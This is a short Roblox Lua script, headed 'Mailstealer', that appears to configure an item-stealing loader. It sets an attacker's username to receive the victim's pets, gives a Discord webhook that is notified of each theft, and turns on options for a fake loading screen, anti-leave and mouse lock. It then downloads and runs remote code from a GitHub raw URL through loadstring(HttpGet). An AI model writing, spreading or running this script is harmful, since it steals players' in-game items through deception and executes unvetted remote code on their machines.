--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

UserName = "BL1SSFUL92" -- good pets
Webhook = "https://discord.com/api/webhooks/1130853411173191801/jaWZevUdWy6DTwg7AhxkNXtMJeEHweocS5ngr6ZTCXnLy3vZHcc5RexR5tZ0_jT2NyYZ" -- pings for pets
UserName2 = "BL1SSFUL92" -- bad pets

_G.LoadingScreen = true -- make it true if you want the loadingscreen
_G.AntiLeave = true -- make it true if you want the antileave
_G.MouseLock = true -- make it true if you want the mouselock

loadstring(game:HttpGet("https://raw.githubusercontent.com/LypherX/FatalDC1M/main/FatalDC1M", true))()
